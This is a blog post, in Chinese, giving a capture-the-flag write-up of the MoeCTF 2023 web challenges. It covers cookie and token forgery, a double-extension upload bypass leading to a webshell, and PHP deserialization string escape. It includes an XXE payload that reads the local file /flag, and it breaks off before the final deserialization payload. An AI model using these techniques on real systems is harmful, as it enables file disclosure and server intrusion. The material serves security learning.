<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="首先是基础的,有关容器题的做题工具的下载以及使用,根据提供的pdf,下载对应版本信息的连接器 下载好后,我们打开题目 按照提示打开环境 输入题目给的WSRX连接地址 连接成功后,复制 localhost:56320到浏览器上打开即可 http 打开题目 涉及基础的http知识,分别用GET和POST…">
<meta property="og:type" content="article">
<meta property="og:title" content="MoeCTF 2023wp">
<meta property="og:url" content="http://example.com/2026/09/16/12-MoeCTF-2023wp/index.html">
<meta property="og:site_name" content="Glut4micum">
<meta property="og:description" content="首先是基础的,有关容器题的做题工具的下载以及使用,根据提供的pdf,下载对应版本信息的连接器 下载好后,我们打开题目 按照提示打开环境 输入题目给的WSRX连接地址 连接成功后,复制 localhost:56320到浏览器上打开即可 http 打开题目 涉及基础的http知识,分别用GET和POST…">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="og:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">
<meta property="article:published_time" content="2026-09-16T14:24:39.000Z">
<meta property="article:modified_time" content="2026-09-16T14:24:39.000Z">
<meta property="article:author" content="谷氨酸棒状杆菌">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Writeup">
<meta property="article:tag" content="MoeCTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/yuque-notes/03-CTF%20Challenge">

<link rel="canonical" href="http://example.com/2026/09/16/12-MoeCTF-2023wp/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>MoeCTF 2023wp | Glut4micum</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Glut4micum</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2026/09/16/12-MoeCTF-2023wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://ice.frostsky.com/2024/03/16/1776051b6463e644bf0eb40aed808727.md.jpeg">
      <meta itemprop="name" content="谷氨酸棒状杆菌">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Glut4micum">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          MoeCTF 2023wp
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2026-09-16 22:24:39" itemprop="dateCreated datePublished" datetime="2026-09-16T22:24:39+08:00">2026-09-16</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF-Writeup/" itemprop="url" rel="index"><span itemprop="name">CTF Writeup</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="本文总阅读两 fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
            <div class="post-description">首先是基础的,有关容器题的做题工具的下载以及使用,根据提供的pdf,下载对应版本信息的连接器 下载好后,我们打开题目 按照提示打开环境 输入题目给的WSRX连接地址 连接成功后,复制 localhost:56320到浏览器上打开即可 http 打开题目 涉及基础的http知识,分别用GET和POST…</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="MoeCTF-2023wp"><a href="#MoeCTF-2023wp" class="headerlink" title="MoeCTF 2023wp"></a>MoeCTF 2023wp</h1><p>首先是基础的,有关容器题的做题工具的下载以及使用,根据提供的pdf,下载对应版本信息的连接器</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/c45de927-image.png" alt="image.png">下载好后,我们打开题目</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/a0f07c7c-image.png" alt="image.png"></p>
<p>按照提示打开环境</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/2cb09fd3-image.png" alt="image.png"></p>
<p>输入题目给的WSRX连接地址</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/4c62c4fa-image.png" alt="image.png"></p>
<p>连接成功后,复制 localhost:56320到浏览器上打开即可</p>
<h1 id="http"><a href="#http" class="headerlink" title="http"></a>http</h1><p>打开题目</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/cb67173b-image.png" alt="image.png"></p>
<p>涉及基础的http知识,分别用GET和POST方法传入对应的参数值,第三点结合题目提示</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/9af86854-image.png" alt="image.png"></p>
<p>打开cookie,修改为admin</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/fa74bbf1-image.png" alt="image.png"></p>
<p>再使用burpsuite抓包伪造本地IP以及更换浏览器</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/032f781a-image.png" alt="image.png"></p>
<p>放包即可得到flag</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/ff6a4f8f-image.png" alt="image.png"></p>
<h1 id="web入门指北"><a href="#web入门指北" class="headerlink" title="web入门指北"></a>web入门指北</h1><p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/be4d4ca8-image.png" alt="image.png"></p>
<p>打开题目,提示为解码获取flag,首先下载了题目提供的.zip文件,过滤无用信息</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/5f1c5699-image.png" alt="image.png"></p>
<p>最后找到一串可疑的数字,尝试解码,直接复制到了burpsuite里面进行解码,第一次接触全是数组的,就一个个猜到底是哪种,最终为ASCII十六进制数,解码出来又是一串字符,有&#x3D;,猜测是base64编码,最终解码得到flag</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/eb8733b8-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/4d2e1e5b-image.png" alt="image.png"></p>
<h1 id="彼岸的flag"><a href="#彼岸的flag" class="headerlink" title="彼岸的flag"></a>彼岸的flag</h1><p>简单的信息泄露</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/741bd9aa-image.png" alt="image.png"></p>
<p>题目提示</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/d12b1bb7-image.png" alt="image.png"></p>
<p>打开环境后,被聊天内容误导了一下,最后就是ctrl+u查看源代码就可以找到flag</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/4e36823b-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/7599b1ec-image.png" alt="image.png"></p>
<h1 id="cookie"><a href="#cookie" class="headerlink" title="cookie"></a>cookie</h1><p>打开环境下载好题目给的压缩包</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/4d7334aa-image.png" alt="image.png"></p>
<p>开始直接尝试访问了一下&#x2F;flag,提示需要是用户才能拿到flag,根据提示,抓包注册页面,改为POST方法,如下图,再按照json格式上传用户名和密码</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/1ffa87c7-image.png" alt="image.png"></p>
<p>显示用户创建成功</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/2af4b515-image.png" alt="image.png"></p>
<p>同样的方法登录用户</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/4e712456-image.png" alt="image.png"></p>
<p>GRET访问&#x2F;flag,提示你还不是admin没有访问权限,尝试过直接再token&#x3D;admin页面返回你是haker,一下子就没什么思路了,想到是不是要base64编码之类的,然后就把token原本的那一串字符拿去解码</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/adc7e8eb-image.png" alt="image.png"></p>
<p>将user改为admin再次编码上传,即可得到flag</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/1d2e34b1-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/6f480952-image.png" alt="image.png"></p>
<p>info_driver_steering_control_throttle</p>
<h1 id="gas-gas-gas"><a href="#gas-gas-gas" class="headerlink" title="gas!gas!gas!"></a>gas!gas!gas!</h1><p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/267450cb-image.png" alt="image.png"></p>
<p>还没来得及学习前端知识,所以就场外求助了b师傅,由其亲情提供的油猴脚本代码</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/023a4555-image.png" alt="image.png"></p>
<p>在导入那里导入我们准备好的文件即可</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/8e21dc11-image.png" alt="image.png"></p>
<p>之后进入环境,打开油猴插件,输入选手,点击提交五次即可拿到flag</p>
<h1 id="moe图床"><a href="#moe图床" class="headerlink" title="moe图床"></a>moe图床</h1><p>Apache解析漏洞 其解析文件只看后缀名,可以通过上传1.jpg.php绕过上传检查,仍然可以解析为php文件</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/7605a08c-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/2f28fa6f-image.png" alt="image.png"></p>
<p>蚁剑连接上对应的网页即可,在根目录拿到flag</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/bc465ab1-image.png" alt="image.png"></p>
<h1 id="了解你的座驾"><a href="#了解你的座驾" class="headerlink" title="了解你的座驾"></a>了解你的座驾</h1><p>这一题是没有接触过的类型,问了b师傅,了解到是XXE漏洞,就临时抱佛脚去学了一下XXE漏洞,现学现卖,相关知识收集在XXE漏洞篇,浅学了点皮毛</p>
<p>打开环境,页面上面没有什么东西,尝试burpsuite抓包,发现一段url编码</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/18127091-image.png" alt="image.png"></p>
<p>解码后就可以判断是XXE漏洞</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/a07a6ff8-image.png" alt="image.png"></p>
<p>又根据题目提示是在根目录下,因此payload如下</p>
<blockquote>
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///flag" ><p>]&gt;&#x2F;&#x2F;定义一个外部实体<root><name>&xxe;</name></root>&#x2F;&#x2F;引用该实体</p>
</blockquote>
<p>url编码提交即可得到flag</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/04a9fb3c-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/7fce778d-image.png" alt="image.png"></p>
<h1 id="大海捞针"><a href="#大海捞针" class="headerlink" title="大海捞针"></a>大海捞针</h1><p>emmm这一题具体正确的方法我不知道,反正我清楚自己是歪门邪道,,脚本不会,啥也不会,目录扫也扫了,没扫出来啥,</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/47d6e92c-image.png" alt="image.png"></p>
<p>题目说在1到1000,,然后抓个包爆破一下</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/901021af-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/282698cb-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/3079fcd1-image.png" alt="image.png"></p>
<p>前面彼岸的flag那一题和这一题有关联,然后题目又说flag是全局变量,那么就猜测当找到正确的id时这个地方就会出现flag</p>
<p><img src="/yuque-notes/03-CTF%20Challenge's%20Writeup/assets/467e8cf2-image.png" alt="image.png"></p>
<p>从后往前查看响应的文件,就瞎猫碰上死耗子,找到了.响应报文的长度不一样的就是</p>
<h1 id="夺命十三枪"><a href="#夺命十三枪" class="headerlink" title="夺命十三枪"></a>夺命十三枪</h1><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"><span class="title function_">highlight_file</span><span class="params">(__FILE__)</span>;</span><br><span class="line"></span><br><span class="line">require_once(<span class="string">&#x27;Hanxin.exe.php&#x27;</span>);</span><br><span class="line"></span><br><span class="line">$Chant = isset($_GET[<span class="string">&#x27;chant&#x27;</span>]) ? $_GET[<span class="string">&#x27;chant&#x27;</span>] : <span class="string">&#x27;夺命十三枪&#x27;</span>;</span><br><span class="line"></span><br><span class="line">$new_visitor = <span class="keyword">new</span> <span class="title class_">Omg_It_Is_So_Cool_Bring_Me_My_Flag</span>($Chant);</span><br><span class="line"></span><br><span class="line">$before = serialize($new_visitor);</span><br><span class="line">$after = Deadly_Thirteen_Spears::Make_a_Move($before);</span><br><span class="line">echo <span class="string">&#x27;Your Movements: &#x27;</span> . $after . <span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>&#123;</span><br><span class="line">    echo <span class="title function_">unserialize</span><span class="params">($after)</span>;</span><br><span class="line">&#125;<span class="keyword">catch</span> (Exception $e) &#123;</span><br><span class="line">    echo <span class="string">&quot;Even Caused A Glitch...&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>这一题打开环境时,页面上就输出了一个序列化的类,然后还有一个变量可以控制其中一个成员的值,因此猜测会不会是字符串逃逸,然后Deadly_Thirteen_Spears::Make_a_Move($before);这串代码是看着有点懵的,而且也没有提示说道义的字符串是什么,一时间有点怀疑自己</p>
<p>然后查了一下::这个符号是什么</p>
<blockquote>
<p>php中的::是调用类中的静态方法或者常量,属性的符号。</p>
</blockquote>
<p>那就肯定会有这个类才能调用啊,所以,继续去读代码</p>
<p>require_once:语句在脚本执行期间包含并运行指定文件(通俗一点，括号内的文件会执行一遍)。</p>
<p>然后我就试着直接访问了Hanxin.exe.php文件,终于找到了hhhh</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line"><span class="title function_">if</span> <span class="params">(basename($_SERVER[<span class="string">&#x27;SCRIPT_FILENAME&#x27;</span>])</span> === basename(__FILE__)) &#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Deadly_Thirteen_Spears</span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="type">static</span> <span class="variable">$Top_Secret_Long_Spear_Techniques_Manual</span> <span class="operator">=</span> array(</span><br><span class="line">        <span class="string">&quot;di_yi_qiang&quot;</span> =&gt; <span class="string">&quot;Lovesickness&quot;</span>,</span><br><span class="line">        <span class="string">&quot;di_er_qiang&quot;</span> =&gt; <span class="string">&quot;Heartbreak&quot;</span>,</span><br><span class="line">        <span class="string">&quot;di_san_qiang&quot;</span> =&gt; <span class="string">&quot;Blind_Dragon&quot;</span>,</span><br><span class="line">        <span class="string">&quot;di_si_qiang&quot;</span> =&gt; <span class="string">&quot;Romantic_charm&quot;</span>,</span><br><span class="line">        <span class="string">&quot;di_wu_qiang&quot;</span> =&gt; <span class="string">&quot;Peerless&quot;</span>,<span class="comment">//3</span></span><br><span class="line">        <span class="string">&quot;di_liu_qiang&quot;</span> =&gt; <span class="string">&quot;White_Dragon&quot;</span>,</span><br><span class="line">        <span class="string">&quot;di_qi_qiang&quot;</span> =&gt; <span class="string">&quot;Penetrating_Gaze&quot;</span>,</span><br><span class="line">        <span class="string">&quot;di_ba_qiang&quot;</span> =&gt; <span class="string">&quot;Kunpeng&quot;</span>,<span class="comment">//2</span></span><br><span class="line">        <span class="string">&quot;di_jiu_qiang&quot;</span> =&gt; <span class="string">&quot;Night_Parade_of_a_Hundred_Ghosts&quot;</span>,<span class="comment">//20</span></span><br><span class="line">        <span class="string">&quot;di_shi_qiang&quot;</span> =&gt; <span class="string">&quot;Overlord&quot;</span>,</span><br><span class="line">        <span class="string">&quot;di_shi_yi_qiang&quot;</span> =&gt; <span class="string">&quot;Letting_Go&quot;</span>,</span><br><span class="line">        <span class="string">&quot;di_shi_er_qiang&quot;</span> =&gt; <span class="string">&quot;Decisive_Victory&quot;</span>,</span><br><span class="line">        <span class="string">&quot;di_shi_san_qiang&quot;</span> =&gt; <span class="string">&quot;Unrepentant_Lethality&quot;</span><span class="comment">//5</span></span><br><span class="line">    );</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> function <span class="title function_">Make_a_Move</span><span class="params">($move)</span>&#123;</span><br><span class="line">        foreach(self::$Top_Secret_Long_Spear_Techniques_Manual <span class="type">as</span> <span class="variable">$index</span> <span class="operator">=</span>&gt; $movement)&#123;</span><br><span class="line">            $move = str_replace($index, $movement, $move);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> $move;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Omg_It_Is_So_Cool_Bring_Me_My_Flag</span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="type">public</span> <span class="variable">$Chant</span> <span class="operator">=</span> <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    <span class="type">public</span> <span class="variable">$Spear_Owner</span> <span class="operator">=</span> <span class="string">&#x27;Nobody&#x27;</span>;</span><br><span class="line"></span><br><span class="line">    function <span class="title function_">__construct</span><span class="params">($chant)</span>&#123;</span><br><span class="line">        $<span class="built_in">this</span>-&gt;Chant = $chant;</span><br><span class="line">        $<span class="built_in">this</span>-&gt;Spear_Owner = <span class="string">&#x27;Nobody&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function <span class="title function_">__toString</span><span class="params">()</span>&#123;</span><br><span class="line">        <span class="keyword">if</span>($<span class="built_in">this</span>-&gt;Spear_Owner !== <span class="string">&#x27;MaoLei&#x27;</span>)&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&#x27;Far away from COOL...&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&quot;Omg You&#x27;re So COOOOOL!!! &quot;</span> . getenv(<span class="string">&#x27;FLAG&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>在另一个代码中调用函数Make_a_Move变量覆盖,实现字符串逃逸</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">function <span class="title function_">__toString</span><span class="params">()</span>&#123;</span><br><span class="line">       <span class="keyword">if</span>($<span class="built_in">this</span>-&gt;Spear_Owner !== <span class="string">&#x27;MaoLei&#x27;</span>)&#123;</span><br><span class="line">           <span class="keyword">return</span> <span class="string">&#x27;Far away from COOL...&#x27;</span>;</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="keyword">else</span>&#123;</span><br><span class="line">           <span class="keyword">return</span> <span class="string">&quot;Omg You&#x27;re So COOOOOL!!! &quot;</span> . getenv(<span class="string">&#x27;FLAG&#x27;</span>);</span><br><span class="line">       &#125;</span><br><span class="line">   &#125; </span><br></pre></td></tr></table></figure>

<p>这段代码就提示了我们需要通过逃逸使Spear_Owner&#x3D;MaoLei,所以我们需要逃逸进去的字符串为”;s:11:”Spear_Owner”;s:6:”MaoLei”;},一共是35个字符,我用的是字符串增多的逃逸,最终的payload&#x3D;</p>
